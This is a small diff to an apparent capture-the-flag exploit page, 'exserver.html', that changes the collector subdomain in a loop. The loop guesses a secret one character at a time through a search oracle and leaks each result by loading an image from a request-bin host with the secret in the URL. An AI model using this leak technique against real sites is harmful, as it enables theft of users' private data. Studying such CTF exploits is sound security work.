--- a/exserver.html
+++ b/exserver.html
@@ -36,7 +36,7 @@
             for (let c of chars) {
                 if (await search(secret + c)) {
                     secret += c;
-                    img.src = `https://pfwovsw.request.dreamhack.games/${secret}`;
+                    img.src = `https://brzhkrf.request.dreamhack.games/${secret}`;
                     break;
                 }
             }
